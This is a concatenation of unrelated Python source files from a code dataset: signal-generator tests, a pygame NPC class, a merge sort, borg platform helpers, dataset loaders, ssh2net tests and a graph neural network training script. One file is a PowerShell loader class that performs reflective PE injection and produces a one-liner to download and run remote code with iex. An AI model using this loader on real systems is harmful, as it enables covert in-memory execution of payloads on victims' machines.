"""Simulates the siggen not responsing to data sent."""
fs = FakeSerial([b'0\n', b'0\n', b'W\n', b'E\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.CommandNotAcknowledgedError):
fy.set_waveform(1, values=[0.0]*8192)
def test_set_sweep(self):
"""Tries every known sweep variable."""
self.fy.set_sweep(enable=False, mode=fygen.SWEEP_FREQUENCY)
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE)
self.fy.set_sweep(mode=fygen.SWEEP_OFFSET)
self.fy.set_sweep(mode=fygen.SWEEP_DUTY_CYCLE)
self.fy.set_sweep(log_sweep=False)
self.fy.set_sweep(log_sweep=True)
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_TIME)
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_VCO_IN)
self.fy.set_sweep(time_seconds=10.1)
self.fy.set_sweep(start_freq_hz=1234.56, end_freq_hz=1234.56)
self.fy.set_sweep(start_volts=12.3456, end_volts=12.3456)
self.fy.set_sweep(start_offset_volts=-12.3456, end_offset_volts=-12.3456)
self.fy.set_sweep(start_duty_cycle=0.1, end_duty_cycle=0.9)
self.assertEqual(
'SBE0\n'
'SOB0\n'
'SBE0\n'
'SOB1\n'
'SBE0\n'
'SOB2\n'
'SBE0\n'
'SOB3\n'
'SBE0\n'
'SMO0\n'
'SBE0\n'
'SMO1\n'
'SBE0\n'
'SXY0\n'
'SBE0\n'
'SXY1\n'
'SBE0\n'
'STI10.10\n'
'SBE0\n'
'SST1234.6\n'
'SEN1234.6\n'
'SBE0\n'
'SST12.346\n'
'SEN12.346\n'
'SBE0\n'
'SST-2.346\n'
'SEN-2.346\n'
'SBE0\n'
'SST10.0\n'
'SEN90.0\n'
'',
self.output.getvalue())
def test_sweep_enable(self):
"""Tries to enable sweep mode."""
with self.assertRaises(fygen.PossibleFirmwareBugError):
self.fy.set_sweep(enable=True)
def test_sweep_enable_forced(self):
"""Tries to enable sweep mode."""
fy = fygen.FYGen(port=self.output)
fy.force_sweep_enable = True
fy.set_sweep(enable=True)
self.assertEqual('SBE1\n', self.output.getvalue())
def test_invalid_sweep_mode(self):
"""Sets an invalid sweep mode."""
with self.assertRaises(fygen.InvalidSweepModeError):
self.fy.set_sweep(mode=5)
def test_invalid_sweep_source(self):
"""Sets an invalid sweep source."""
with self.assertRaises(fygen.InvalidSweepSourceError):
self.fy.set_sweep(source=2)
def test_sweep_vco_with_time(self):
"""Sets a time with a VCO source."""
with self.assertRaises(fygen.InvalidSweepSourceError):
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_VCO_IN, time_seconds=1)
def test_invalid_sweep_time(self):
"""Sets an invalid sweep time."""
with self.assertRaises(fygen.InvalidSweepTimeError):
self.fy.set_sweep(time_seconds=0)
def test_sweep_start_freq_in_invalid_mode(self):
"""Sets start_freq_hz in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE, start_freq_hz=1000)
def test_invalid_start_freq(self):
"""Sets start_freq_hz to zero."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_sweep(start_freq_hz=0)
def test_sweep_end_freq_in_invalid_mode(self):
"""Sets end_freq_hz in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE, end_freq_hz=1000)
def test_invalid_end_freq(self):
"""Sets end_freq_hz to zero."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_sweep(end_freq_hz=0)
def test_sweep_start_volts_in_invalid_mode(self):
"""Sets start_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_volts=10)
def test_invalid_start_volts(self):
"""Sets start_volts to zero and too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_volts=0)
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_volts=30)
def test_sweep_end_volts_in_invalid_mode(self):
"""Sets end_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_volts=10)
def test_invalid_end_volts(self):
"""Sets end_volts to zero and too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_volts=0)
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_volts=30)
def test_sweep_start_offset_volts_in_invalid_mode(self):
"""Sets start_offset_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_offset_volts=10)
def test_invalid_start_offset_volts(self):
"""Sets start_offset_volts too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_offset_volts=30)
def test_sweep_end_offset_volts_in_invalid_mode(self):
"""Sets end_offset_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_offset_volts=10)
def test_invalid_end_offset_volts(self):
"""Sets end_offset_volts too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_offset_volts=30)
def test_sweep_start_duty_cycle_in_invalid_mode(self):
"""Sets start_duty_cycle in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_duty_cycle=0.1)
def test_invalid_start_duty_cycle(self):
"""Sets start_duty_cycle to zero and too high."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(start_duty_cycle=0)
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(start_duty_cycle=1)
def test_sweep_end_duty_cycle_in_invalid_mode(self):
"""Sets end_duty_cycle in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_duty_cycle=0.9)
def test_invalid_end_duty_cycle(self):
"""Sets end_duty_cycle to zero and one."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(end_duty_cycle=0)
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(end_duty_cycle=1)
def test_set_measurement(self):
"""Tests all combinations of set_measurement."""
self.fy.set_measurement(reset_counter=True)
self.fy.set_measurement(pause=False)
self.fy.set_measurement(pause=True)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_1S)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_10S)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_100S)
self.fy.set_measurement(coupling=fygen.COUPLING_DC)
self.fy.set_measurement(coupling=fygen.COUPLING_AC)
self.assertEqual(
'WCZ0\n'
'WCP1\n'
'WCP0\n'
'WCG0\n'
'WCG1\n'
'WCG2\n'
'WCC1\n'
'WCC0\n',
self.output.getvalue())
def test_set_measurement_invalid_gate_time(self):
"""Passes an invalid gate_time."""
with self.assertRaises(fygen.InvalidGateTimeError):
self.fy.set_measurement(gate_time=4)
def test_set_measurement_invalid_coupling(self):
"""Passes an invalid coupling."""
with self.assertRaises(fygen.InvalidCouplingError):
self.fy.set_measurement(coupling=2)
def test_get_measurement(self):
"""Gets all measurements."""
fs = FakeSerial([
b'0\n', # gate mode = 1S
b'0000000668\n', # freq_hz
b'0000060668\n', # period_sec
b'0000012345\n', # positive_width_sec
b'0000054321\n', # negative_width_sec
b'0000000541\n', # duty cycle
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(
{
'freq_hz': 668.0,
'period_sec': 6.0668e-5,
'positive_width_sec': 1.2345e-5,
'negative_width_sec': 5.4321e-5,
'duty_cycle': 0.541
},
fy.get_measurement())
def test_get_measurement_counter(self):
"""Gets the counter measurement."""
fs = FakeSerial([
b'0000000669\n', # counter
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({'counter': 669}, fy.get_measurement({'counter'}))
def test_get_measurement_frequency(self):
"""Gets frequencies."""
fs = FakeSerial([
b'0\n', # gate mode = 1S
b'0000000668\n', # freq_hz
b'1\n', # gate mode = 10S
b'0000000668\n', # freq_hz
b'2\n', # gate mode = 100S
b'0000000668\n', # freq_hz
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(668.0, fy.get_measurement('freq_hz'))
self.assertEqual(66.8, fy.get_measurement('freq_hz'))
self.assertEqual(6.68, fy.get_measurement('freq_hz'))
def test_get_measurement_invalid_gate_time(self):
"""siggen returns an unexpected gate time mode."""
fs = FakeSerial([
b'x\n', # gate mode = ???
b'0000000668\n', # freq_hz
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.InvalidGateTimeError):
fy.get_measurement('freq_hz')
def test_get_measurement_unknown_parameter(self):
"""requests an unknown parameter."""
with self.assertRaises(fygen.UnknownParameterError):
self.fy.get_measurement('foo')
def test_save(self):
"""Saves parameters."""
self.fy.save(2)
self.assertEqual('USN02\n', self.output.getvalue())
def test_load(self):
"""Loads parameters."""
self.fy.load(3)
self.assertEqual('ULN03\n', self.output.getvalue())
def test_set_synchronization(self):
"""Sets all known sync modes."""
self.fy.set_synchronization(wave=True)
self.fy.set_synchronization(freq=True)
self.fy.set_synchronization(volts=True)
self.fy.set_synchronization(offset_volts=True)
self.fy.set_synchronization(duty_cycle=True)
self.assertEqual(
'USA0\n'
'USA1\n'
'USA2\n'
'USA3\n'
'USA4\n'
'',
self.output.getvalue())
def test_get_synchronization(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'0\n', # duty cycle
b'255\n', # freq
b'0\n', # offset_volts
b'255\n', # volts
b'0\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({
'duty_cycle': False,
'freq': True,
'offset_volts': False,
'volts': True,
'wave': False,
}, fy.get_synchronization())
self.assertEqual(
'RSA4\n'
'RSA1\n'
'RSA3\n'
'RSA2\n'
'RSA0\n'
'',
fs.getvalue())
def test_get_synchronization_dict(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'255\n', # duty cycle
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(
{'duty_cycle': True},
fy.get_synchronization(('duty_cycle',)))
self.assertEqual('RSA4\n', fs.getvalue())
def test_get_synchronization_single(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'0\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(False, fy.get_synchronization('wave'))
self.assertEqual('RSA0\n', fs.getvalue())
def test_get_invalid_sync_mode(self):
"""Gets an invalid sync mode."""
with self.assertRaises(fygen.InvalidSynchronizationMode):
self.fy.get_synchronization('foo')
def test_set_buzzer(self):
"""Sets the buzzer."""
self.fy.set_buzzer(False)
self.fy.set_buzzer(True)
self.assertEqual('UBZ0\nUBZ1\n', self.output.getvalue())
def test_get_buzzer(self):
"""Gets buzzer state."""
fs = FakeSerial([
b'0\n',
b'255\n',
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertFalse(fy.get_buzzer())
self.assertTrue(fy.get_buzzer())
self.assertEqual('RBZ\nRBZ\n', fs.getvalue())
def test_set_uplink(self):
"""Tries all setuplink combinations."""
self.fy.set_uplink(is_master=True, enable=False)
self.fy.set_uplink(is_master=False, enable=True)
self.assertEqual(
'UUL0\n'
'UMS0\n'
'UMS1\n'
'UUL1\n'
'',
self.output.getvalue())
def test_get_uplink(self):
"""Gets uplink settings."""
fs = FakeSerial([
b'0\n',
b'255\n',
b'255\n',
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({'enable': False, 'is_master': False}, fy.get_uplink())
self.assertTrue(fy.get_uplink('enable'))
self.assertEqual('RUL\nRMS\nRUL\n', fs.getvalue())
def test_get_id(self):
"""Gets device id."""
fs = FakeSerial([b'12345\n',])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('12345', fy.get_id())
self.assertEqual('UID\n', fs.getvalue())
def test_get_model(self):
"""Gets device model."""
fs = FakeSerial([b'fy2300\n',])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('fy2300', fy.get_model())
self.assertEqual('UMO\n', fs.getvalue())
def test_auto_detect_on_init(self):
"""Autodetects runs on FYGen init"""
fs = FakeSerial([b'FY6900-60\n',])
fy = fygen.FYGen(port=fs, _port_is_serial=True)
self.assertEqual('fy6900', fy.device_name)
self.assertEqual('UMO\n', fs.getvalue())
def test_auto_detect(self):
self.assertEqual(fygen.detect_device('FY6900-60M'), 'fy6900')
self.assertEqual(fygen.detect_device('FY2350H'), 'fy2300')
def test_autodetect_no_conflict(self):
"""
Make sure no exact match maps to the wrong device.
This is just to future proof in case two devices with
leading 4-char prefix gets added that have different waveform id's
"""
for device in SUPPORTED_DEVICES:
self.assertEqual(fygen.detect_device(device), device)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
130000 | <reponame>RileyWClarke/flarubin<gh_stars>0
# Tuples of RA,dec in degrees
ELAISS1 = (9.45, -44.)
XMM_LSS = (35.708333, -4-45/60.)
ECDFS = (53.125, -28.-6/60.)
COSMOS = (150.1, 2.+10./60.+55/3600.)
EDFS_a = (58.90, -49.315)
EDFS_b = (63.6, -47.60)
def ddf_locations():
"""Return the DDF locations as as dict. RA and dec in degrees.
"""
result = {}
result['ELAISS1'] = ELAISS1
result['XMM_LSS'] = XMM_LSS
result['ECDFS'] = ECDFS
result['COSMOS'] = COSMOS
result['EDFS_a'] = EDFS_a
result['EDFS_b'] = EDFS_b
return result
| StarcoderdataPython |
171743 | <filename>NPC.py
import sys, pygame, math
class NPC(pygame.sprite.Sprite):
def __init__(self, maxSpeed, pos = [0,0]):
pygame.sprite.Sprite.__init__(self, self.containers)
#Images From: URL: http://opengameart.org/content/classic-knight-animated
playerSize = [25,25]
self.rightImages = [pygame.transform.scale(pygame.image.load("NPC\NPC Images\walkRight0.png"), playerSize)
]
self.leftImages = [pygame.transform.scale(pygame.image.load("NPC\NPC Images\walkLeft0.png"), playerSize)
]
self.upImages = [pygame.transform.scale(pygame.image.load("NPC\NPC Images\walkUp0.png"), playerSize)
]
self.downImages = [pygame.transform.scale(pygame.image.load("NPC\NPC Images\walkDown0.png"), playerSize)
]
self.images = self.rightImages
self.frame = 0
self.maxFrame = len(self.images)-1
self.image = self.images[self.frame]
self.rect = self.image.get_rect()
self.xDirection = "right"
self.yDirection = "none"
self.speedx = 0
self.speedy = 0
self.speed = [self.speedx, self.speedy]
self.maxSpeedx = maxSpeed[0]
self.maxSpeedy = maxSpeed[1]
self.timer = 0
self.timerMax = .25* 60
self.didBounceX = False
self.didBounceY = False
self.rect = self.rect.move(pos)
self.living = True
self.lives = 3
self.score = 0
def die(self):
self.lives -= 1
self.lives
if self.lives <= 0:
self.living = False
def update(*args):
self = args[0]
size = args[1]
self.move()
self.animate()
self.collideScreen(size)
def collideObject(self, other):
if self.rect.right > other.rect.left and self.rect.left < other.rect.right:
if self.rect.bottom > other.rect.top and self.rect.top < other.rect.bottom:
if self.radius + other.radius > self.distanceTo(other.rect.center):
return True
return False
def collideScreen(self, size):
width = size[0]
height = size[1]
if not self.didBounceX:
if self.rect.center[0] < -1:
self.rect.center = (width, self.rect.center[1])
elif self.rect.center[0] > width+1:
self.rect.center = (0, self.rect.center[1])
def collideHardblock(self, other):
if self.rect.right > other.rect.left and self.rect.left < other.rect.right:
if self.rect.bottom > other.rect.top and self.rect.top < other.rect.bottom:
self.speedx = -self.speedx
self.speedy = -self.speedy
self.move()
self.speedx = 0
self.speedy = 0
def animate(self):
if self.timer < self.timerMax:
self.timer += 1
else:
self.timer = 0
if self.frame < self.maxFrame:
self.frame += 1
else:
self.frame = 0
self.image = self.images[self.frame]
def move(self):
self.speed = [self.speedx, self.speedy]
self.rect = self.rect.move(self.speed)
self.didBounceX = False
self.didBounceY = False
def distanceTo(self, pt):
x1 = self.rect.center[0]
y1 = self.rect.center[1]
x2 = pt[0]
y2 = pt[1]
return math.sqrt((x1-x2)**2+(y1-y2)**2)
| StarcoderdataPython |
1749063 | <gh_stars>1-10
#
# MIT License
#
# Copyright 2017 Launchpad project contributors (see COPYRIGHT.md)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
import base64
import os
from django.conf import settings
from .interface import BaseLoader
ps1_loader_template = """
{script}
$b = @"
{executable}
"@
$b = [Byte[]][Convert]::FromBase64String($b)
Invoke-ReflectivePEInjection -PEBytes $b -ForceASLR
"""
class Ps1Loader(BaseLoader):
platform = ['windows']
cpu = ['x86', 'x64']
def get_loader(self, executable):
with open(str(settings.DEPENDENCIES_DIR / 'ps1' / 'Invoke-ReflectivePEInjection.ps1'), 'r') as fp:
script = fp.read()
if isinstance(executable, (str, os.PathLike)):
with open(executable, 'rb') as fp:
executable = fp.read()
elif not isinstance(executable, (bytes, bytearray)):
raise ValueError('`executable` must be path to a file or binary blob.')
executable = base64.b64encode(executable).decode()
result = ps1_loader_template.format(**locals())
return result
def get_oneliner(self, loader_url):
return f"(New-Object System.Net.WebClient).DownloadString('{loader_url}')|iex"
| StarcoderdataPython |
13707 | import pixiedust
my_logger = pixiedust.getLogger(__name__)
| StarcoderdataPython |
45004 | def mergeSort(elements):
if len(elements) == 0 or len(elements) == 1:
# BASE CASE
return elements
middle = len(elements) // 2
left = mergeSort(elements[:middle])
right = mergeSort(elements[middle:])
if left == [] or right == []:
return left or right
result = []
i, j = 0, 0
while (len(result) < len(left) + len(right)):
if left[i] < right[j]:
result.append(left[i])
i+= 1
else:
result.append(right[j])
j+= 1
if i == len(left) or j == len(right):
result.extend(left[i:] or right[j:])
break
return result
print(mergeSort([3,4,5,1,2,8,3,7,6])) | StarcoderdataPython |
1653117 | <filename>src/borg/platform/base.py
import os
"""
platform base module
====================
Contains platform API implementations based on what Python itself provides. More specific
APIs are stubs in this module.
When functions in this module use platform APIs themselves they access the public
platform API: that way platform APIs provided by the platform-specific support module
are correctly composed into the base functionality.
"""
API_VERSION = 3
fdatasync = getattr(os, 'fdatasync', os.fsync)
def acl_get(path, item, st, numeric_owner=False):
"""
Saves ACL Entries
If `numeric_owner` is True the user/group field is not preserved only uid/gid
"""
def acl_set(path, item, numeric_owner=False):
"""
Restore ACL Entries
If `numeric_owner` is True the stored uid/gid is used instead
of the user/group names
"""
try:
from os import lchflags
def set_flags(path, bsd_flags, fd=None):
lchflags(path, bsd_flags)
except ImportError:
def set_flags(path, bsd_flags, fd=None):
pass
def get_flags(path, st):
"""Return BSD-style file flags for path or stat without following symlinks."""
return getattr(st, 'st_flags', 0)
def sync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class SyncFile:
"""
A file class that is supposed to enable write ordering (one way or another) and data durability after close().
The degree to which either is possible varies with operating system, file system and hardware.
This fallback implements a naive and slow way of doing this. On some operating systems it can't actually
guarantee any of the above, since fsync() doesn't guarantee it. Furthermore it may not be possible at all
to satisfy the above guarantees on some hardware or operating systems. In these cases we hope that the thorough
checksumming implemented catches any corrupted data due to misordered, delayed or partial writes.
Note that POSIX doesn't specify *anything* about power failures (or similar failures). A system that
routinely loses files or corrupts file on power loss is POSIX compliant.
TODO: Use F_FULLSYNC on OSX.
TODO: A Windows implementation should use CreateFile with FILE_FLAG_WRITE_THROUGH.
"""
def __init__(self, path):
self.fd = open(path, 'xb')
self.fileno = self.fd.fileno()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def write(self, data):
self.fd.write(data)
def sync(self):
"""
Synchronize file contents. Everything written prior to sync() must become durable before anything written
after sync().
"""
from .. import platform
self.fd.flush()
platform.fdatasync(self.fileno)
if hasattr(os, 'posix_fadvise'):
os.posix_fadvise(self.fileno, 0, 0, os.POSIX_FADV_DONTNEED)
def close(self):
"""sync() and close."""
from .. import platform
self.sync()
self.fd.close()
platform.sync_dir(os.path.dirname(self.fd.name))
def swidth(s):
"""terminal output width of string <s>
For western scripts, this is just len(s), but for cjk glyphs, 2 cells are used.
"""
return len(s)
| StarcoderdataPython |
177507 | <gh_stars>10-100
import os
from urllib import request
import numpy as np
from numpy import genfromtxt
from .. import pklhandler
'''
This module contains helper functions to download and load
the boston housing dataset.
'''
def get():
'''
Downloads the boston dataset from
https://archive.ics.uci.edu/ml/machine-learning-databases/housing/
and saves it as a pkl file `boston.pkl`.
Raises
------
urllib.error.URLError
If internet connection is not available or the URL is not accessible.
OSError
If the file cannot be created due to a system-related error.
KeyError
If invalid/unknown type.
Note
----
You only need to call this method once, i.e, after the dataset has been downloaded
and you have the `boston.pkl` file, you don't need to call this method again.
'''
# Url to download the dataset from
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/housing/housing.data'
# Download the dataset
print('Downloading housing.data...')
request.urlretrieve(url, 'housing.data')
print('Download complete.')
# Parse the data and save it as a pkl file
pklhandler.save(genfromtxt('housing.data'), 'boston.pkl')
# Delete unnecessary files
os.remove('housing.data')
print('Deleted unnecessary files.')
def load():
'''
Loads the boston housing dataset from pkl file.
The inputs have following columns:
- CRIM :
per capita crime rate by town
- ZN :
proportion of residential land zoned for lots over 25,000 sq.ft.
- INDUS :
proportion of non-retail business acres per town
- CHAS :
Charles River dummy variable (= 1 if tract bounds river; 0 otherwise)
- NOX :
nitric oxides concentration (parts per 10 million)
- RM :
average number of rooms per dwelling
- AGE :
proportion of owner-occupied units built prior to 1940
- DIS :
weighted distances to five Boston employment centres
- RAD :
index of accessibility to radial highways
- TAX :
full-value property-tax rate per $10,000
- PTRATIO :
pupil-teacher ratio by town
- B :
1000(Bk - 0.63)^2 where Bk is the proportion of black by town
- LSTAT :
% lower status of the population
The outputs are
- MEDV :
Median value of owner-occupied homes in $1000's
Returns
-------
inputs_train : numpy.array
outputs_train : numpy.array
inputs_test : numpy.array
outputs_test : numpy.array
'''
data_array = pklhandler.load('boston.pkl')
inputs_train = data_array[0:500, :-1]
outputs_train = data_array[0:500, -1]
inputs_test = data_array[500:, :-1]
outputs_test = data_array[500:, -1]
return inputs_train, outputs_train, inputs_test, outputs_test | StarcoderdataPython |
3398720 | <filename>tests/unit/test_core_driver.py<gh_stars>1-10
import sys
import pytest
from ssh2net.exceptions import UnknownPrivLevel
from ssh2net.core.driver import BaseNetworkDriver
from ssh2net.core.cisco_iosxe.driver import PRIVS
IOS_ARP = """Protocol Address Age (min) Hardware Addr Type Interface
Internet 172.31.254.1 - 0000.0c07.acfe ARPA Vlan254
Internet 172.31.254.2 - c800.84b2.e9c2 ARPA Vlan254
"""
def test__determine_current_priv():
base_driver = BaseNetworkDriver()
base_driver.privs = PRIVS
current_priv = base_driver._determine_current_priv("execprompt>")
assert current_priv.name == "exec"
def test__determine_current_priv_unknown():
base_driver = BaseNetworkDriver()
base_driver.privs = PRIVS
with pytest.raises(UnknownPrivLevel):
base_driver._determine_current_priv("!!!!thisissoooowrongggg!!!!!!?!")
@pytest.mark.skipif(sys.platform.startswith("win"), reason="not supporting textfsm on windows")
def test_textfsm_parse_output():
base_driver = BaseNetworkDriver()
base_driver.textfsm_platform = "cisco_ios"
result = base_driver.textfsm_parse_output("show ip arp", IOS_ARP)
assert isinstance(result, list)
assert result[0] == ["Internet", "172.31.254.1", "-", "0000.0c07.acfe", "ARPA", "Vlan254"]
| StarcoderdataPython |
3336180 | <filename>AtCoder/ABC/153/D. Caracal Vs Monster.py
def f(x):
if x == 1:
return 1
else:
k = f(x//2)
return 1+2*k
H = int(input())
print(f(H)) | StarcoderdataPython |
1676698 | from __future__ import division
from __future__ import print_function
import time
import argparse
import numpy as np
import torch
import torch.nn.functional as F
import torch.optim as optim
from pygcn.utils import load_data, accuracy
from pygcn.models import GCN, MLP
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
# Training settings
parser = argparse.ArgumentParser()
parser.add_argument('--no-cuda', action='store_true', default=False,
help='Disables CUDA training.')
parser.add_argument('--fastmode', action='store_true', default=False,
help='Validate during training pass.')
parser.add_argument('--seed', type=int, default=42, help='Random seed.')
parser.add_argument('--epochs', type=int, default=5000,
help='Number of epochs to train.')
parser.add_argument('--lr', type=float, default=0.01,
help='Initial learning rate.')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='Weight decay (L2 loss on parameters).')
parser.add_argument('--hidden', type=int, default=32,
help='Number of hidden units.')
parser.add_argument('--input_droprate', type=float, default=0.5,
help='Dropout rate of the input layer (1 - keep probability).')
parser.add_argument('--hidden_droprate', type=float, default=0.5,
help='Dropout rate of the hidden layer (1 - keep probability).')
parser.add_argument('--dropnode_rate', type=float, default=0.5,
help='Dropnode rate (1 - keep probability).')
parser.add_argument('--patience', type=int, default=100, help='Patience')
parser.add_argument('--order', type=int, default=5, help='Propagation step')
parser.add_argument('--sample', type=int, default=4, help='Sampling times of dropnode')
parser.add_argument('--tem', type=float, default=0.5, help='Sharpening temperature')
parser.add_argument('--lam', type=float, default=1., help='Lamda')
parser.add_argument('--dataset', type=str, default='cora', help='Data set')
parser.add_argument('--cuda_device', type=int, default=4, help='Cuda device')
parser.add_argument('--use_bn', action='store_true', default=False, help='Using Batch Normalization')
#dataset = 'citeseer'
#dataset = 'pubmed'
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.cuda.set_device(args.cuda_device)
dataset = args.dataset
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
# Load data
A, features, labels, idx_train, idx_val, idx_test = load_data(dataset)
idx_unlabel = torch.arange(idx_train.shape[0], labels.shape[0], dtype=int)
# Model and optimizer
model = MLP(nfeat=features.shape[1],
nhid=args.hidden,
nclass=labels.max().item() + 1,
input_droprate=args.input_droprate,
hidden_droprate=args.hidden_droprate,
use_bn = args.use_bn)
optimizer = optim.Adam(model.parameters(),
lr=args.lr, weight_decay=args.weight_decay)
if args.cuda:
model.cuda()
features = features.cuda()
A = A.cuda()
labels = labels.cuda()
idx_train = idx_train.cuda()
idx_val = idx_val.cuda()
idx_test = idx_test.cuda()
idx_unlabel = idx_unlabel.cuda()
def propagate(feature, A, order):
#feature = F.dropout(feature, args.dropout, training=training)
x = feature
y = feature
for i in range(order):
x = torch.spmm(A, x).detach_()
#print(y.add_(x))
y.add_(x)
return y.div_(order+1.0).detach_()
def rand_prop(features, training):
n = features.shape[0]
drop_rate = args.dropnode_rate
drop_rates = torch.FloatTensor(np.ones(n) * drop_rate)
if training:
masks = torch.bernoulli(1. - drop_rates).unsqueeze(1)
features = masks.cuda() * features
else:
features = features * (1. - drop_rate)
features = propagate(features, A, args.order)
return features
def consis_loss(logps, temp=args.tem):
ps = [torch.exp(p) for p in logps]
sum_p = 0.
for p in ps:
sum_p = sum_p + p
avg_p = sum_p/len(ps)
#p2 = torch.exp(logp2)
sharp_p = (torch.pow(avg_p, 1./temp) / torch.sum(torch.pow(avg_p, 1./temp), dim=1, keepdim=True)).detach()
loss = 0.
for p in ps:
loss += torch.mean((p-sharp_p).pow(2).sum(1))
loss = loss/len(ps)
return args.lam * loss
def train(epoch):
t = time.time()
X = features
model.train()
optimizer.zero_grad()
X_list = []
K = args.sample
for k in range(K):
X_list.append(rand_prop(X, training=True))
output_list = []
for k in range(K):
output_list.append(torch.log_softmax(model(X_list[k]), dim=-1))
loss_train = 0.
for k in range(K):
loss_train += F.nll_loss(output_list[k][idx_train], labels[idx_train])
loss_train = loss_train/K
#loss_train = F.nll_loss(output_1[idx_train], labels[idx_train]) + F.nll_loss(output_1[idx_train], labels[idx_train])
#loss_js = js_loss(output_1[idx_unlabel], output_2[idx_unlabel])
#loss_en = entropy_loss(output_1[idx_unlabel]) + entropy_loss(output_2[idx_unlabel])
loss_consis = consis_loss(output_list)
loss_train = loss_train + loss_consis
acc_train = accuracy(output_list[0][idx_train], labels[idx_train])
loss_train.backward()
optimizer.step()
if not args.fastmode:
model.eval()
X = rand_prop(X,training=False)
output = model(X)
output = torch.log_softmax(output, dim=-1)
loss_val = F.nll_loss(output[idx_val], labels[idx_val])
acc_val = accuracy(output[idx_val], labels[idx_val])
print('Epoch: {:04d}'.format(epoch+1),
'loss_train: {:.4f}'.format(loss_train.item()),
'acc_train: {:.4f}'.format(acc_train.item()),
'loss_val: {:.4f}'.format(loss_val.item()),
'acc_val: {:.4f}'.format(acc_val.item()),
'time: {:.4f}s'.format(time.time() - t))
return loss_val.item(), acc_val.item()
def Train():
# Train model
t_total = time.time()
loss_values = []
acc_values = []
bad_counter = 0
# best = args.epochs + 1
loss_best = np.inf
acc_best = 0.0
loss_mn = np.inf
acc_mx = 0.0
best_epoch = 0
for epoch in range(args.epochs):
# if epoch < 200:
# l, a = train(epoch, True)
# loss_values.append(l)
# acc_values.append(a)
# continue
l, a = train(epoch)
loss_values.append(l)
acc_values.append(a)
print(bad_counter)
